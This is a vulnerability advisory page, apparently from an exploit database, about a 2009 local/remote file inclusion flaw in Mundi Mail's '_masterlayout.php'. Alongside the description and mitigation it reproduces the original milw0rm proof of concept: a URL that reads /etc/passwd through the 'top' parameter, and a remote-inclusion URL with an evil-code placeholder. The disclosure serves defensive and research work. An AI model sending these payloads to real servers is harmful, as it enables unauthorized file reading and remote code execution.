Mundi Mail Local/Remote File Inclusion Vulnerability

vendor:

Mundi Mail

by:

br0ly

7,5

CVSS

HIGH

Local/Remote File Inclusion

CWE

Product Name: Mundi Mail

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows, Linux, Mac

2009

Mundi Mail Local/Remote File Inclusion Vulnerability

Mundi Mail is prone to a local/remote file-inclusion vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this issue to include arbitrary local or remote files, allowing for the execution of arbitrary PHP code. This issue affects the 'template/simpledefault/admin/_masterlayout.php' script. The attacker must have access to register_globals and allow_url_fopen must be enabled for remote file inclusion. If magic_quotes_gpc is disabled, local file inclusion is possible.

Mitigation:

Ensure that user-supplied input is properly sanitized before use.

Source

Exploit-DB raw data:

----------------------------------------------------------------------------------------------------------


  Name : Mundi Mail
  Site : http://sourceforge.net/projects/mundimail/

  Down : http://sourceforge.net/project/showfiles.php?group_id=100875&package_id=108474&release_id=221732


----------------------------------------------------------------------------------------------------------


 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com


----------------------------------------------------------------------------------------------------------


  Description:

  Bug : Local/Remote File Inclusion

 template/simpledefault/admin/_masterlayout.php:10:	include($top);




  If allow_url_fopen=on   --> RFI;
  If magic_quotes_gpc=off --> LFI;  



----------------------------------------------------------------------------------------------------------


  P0c:
 
    LFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=/etc/passwd

    RFI:http://localhost/Scripts/mundimail/template/simpledefault/admin/_masterlayout.php?top=[EVIL_CODE]


  OBS: need register_globals=on;

----------------------------------------------------------------------------------------------------------

# milw0rm.com [2009-06-15]